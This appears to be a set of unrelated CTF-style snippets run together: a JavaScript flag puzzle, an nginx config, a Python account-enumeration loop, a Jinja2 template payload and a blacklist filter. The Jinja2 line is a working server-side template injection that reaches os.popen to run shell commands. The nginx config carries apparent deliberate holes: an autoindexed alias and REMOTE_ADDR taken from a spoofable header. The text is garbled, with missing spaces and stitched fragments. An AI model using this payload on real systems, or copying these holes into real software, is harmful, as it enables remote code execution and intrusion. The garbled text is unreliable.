function$() { var e = document.getElementById("c").value; if (e.length == 16) if (e.match(/^be0f23/) != null) if (e.match(/233ac/) != null) if (e.match(/e98aa$/) != null) if (e.match(/c7be9/) != null) { var t = ["fl", "s_a", "i", "e}"]; var n = ["a", "_h0l", "n"]; var r = ["g{", "e", "_0"]; var i = ["it'", "_", "n"]; var s = [t, n, r, i]; for (var o = 0; o < 13; ++o) { document.write(s[o % 4][0]); s[o % 4].splice(0, 1) } } } document.write('<input id="c"><button onclick=$()>Ok</button>'); delete _
server { listen8080; ## listen for ipv4; this line is default and implied listen [::]:8080; ## listen for ipv6 root /var/www/html; index index.php index.html index.htm; port_in_redirectoff; server_name _; # Make site accessible from http://localhost/ #server_name localhost; # If block for setting the time for the logfile if ($time_iso8601 ~ "^(\d{4})-(\d{2})-(\d{2})") { set $year $1; set$month$2; set$day$3; } # Disable sendfile as per https://docs.vagrantup.com/v2/synced-folders/virtualbox.html sendfile off; set$http_x_forwarded_for_filt$http_x_forwarded_for; if ($http_x_forwarded_for_filt~ ([0-9]+\.[0-9]+\.[0-9]+\.)[0-9]+) { set$http_x_forwarded_for_filt$1???; } # Add stdout logging access_log /var/log/nginx/$hostname-access-$year-$month-$day.log openshift_log; error_log /var/log/nginx/error.log info; location / { # First attempt to serve request as file, then # as directory, then fall back to index.html try_files $uri $uri/ /index.php?q=$uri&$args; server_tokensoff; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } location~ \.php$ { try_files$uri$uri/ /index.php?q=$uri&$args; fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass unix:/var/run/php/php5.6-fpm.sock; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param SCRIPT_NAME $fastcgi_script_name; fastcgi_index index.php; include fastcgi_params; fastcgi_param REMOTE_ADDR $http_x_forwarded_for; } location~ /\. { log_not_foundoff; deny all; } location /web-img { alias /images/; autoindexon; } location~* \.(ini|docx|pcapng|doc)$ { deny all; } include /var/www/nginx[.]conf; }
for x inrange(1,100): login = { "email": str(x)+"@qqq.com", "password": "1" } response2 = requests.post(url=url2, data=login) r = response2.text left = r.find(' ') right = r.find('</span>') con = r[left:right].strip() content += con print(con) print(content)
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{{c.__init__.func_globals['linecache'].__dict__['os'].popen('ls').read()}}{% endif %}{% endfor %}
defsafe_jinja(s): s = s.replace('(', '').replace(')', '') blacklist = ['config', 'self'] return''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s